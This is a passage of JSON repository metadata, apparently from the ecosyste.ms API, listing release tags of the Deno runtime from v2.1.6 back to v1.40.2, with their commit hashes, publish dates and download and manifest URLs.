.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_